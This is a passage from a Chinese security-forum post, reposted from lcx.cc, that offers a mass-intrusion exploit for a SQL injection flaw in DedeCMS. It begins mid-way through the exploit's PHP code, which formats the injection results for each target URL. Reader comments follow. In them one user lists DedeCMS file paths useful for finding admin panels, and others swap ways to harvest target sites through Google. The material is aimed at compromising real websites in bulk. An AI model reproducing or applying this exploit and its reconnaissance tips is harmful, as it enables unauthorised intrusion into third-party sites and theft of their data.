Sunshie (博客求大牛友链http://phpinfo.me) | 2014-02-28 21:00
(.*)_", $exp, $arr);
$exploit=str_replace("_", "==fuck", $arr[0]);
$exploit=str_replace(" _", "fuck==", $exploit);
return "网址:".$sb."注入结果 :".$exploit."rn--------------------------rn";
}
?>
以上代码保存为ANSI格式
效果如下
各种吐槽:
1#
404 (我要死了) | 2014-02-28 21:01
Mark!
2#
ver007 | 2014-02-28 21:02
///////////////////////////////
3#
中国公民 (恩?) | 2014-02-28 21:20
没后台,谁共享个找后台的技巧。
常用的
data/mysqli_error_trace.inc
data/mysql_error_trace.inc
4#
园长 (你在身边就是缘,缘分写在数据库里面。) | 2014-02-28 21:28
少年没有google采集哦。
5#
乌云 ()? () | 2014-02-28 21:45
@园长 google现在正则匹配好麻烦,以前的API也没了,不知道园长MM有啥好的采集方法?
6#
爱上平顶山 (爱上平顶山) | 2014-02-28 21:53
@园长 你的博客 路径啥的泄露了
7#
园长 (你在身边就是缘,缘分写在数据库里面。) | 2014-02-28 21:56
@爱上平顶山 无聊出来透透气,后面还有个。
8#
园长 (你在身边就是缘,缘分写在数据库里面。) | 2014-02-28 21:58
@乌云 google 很简单,可以看下我之前发的s2那个http://zone.wooyun.org/content/8385。
9#
乌云 ()? () | 2014-02-28 22:06
@园长 强大的正则!
10#
TellYouThat | 2014-02-28 22:35
神速啊都。。
11#
浪子老柒 | 2014-02-28 22:59
mark..
12#
忆苦思甜 (只是一个傻逼。) | 2014-02-28 23:57
怎么保存结果。
13#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2014-03-01 09:28
mark...
留言评论(旧系统):
文章来源于lcx.cc:DedeCMS 注入漏洞批量入侵爆菊 Exp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论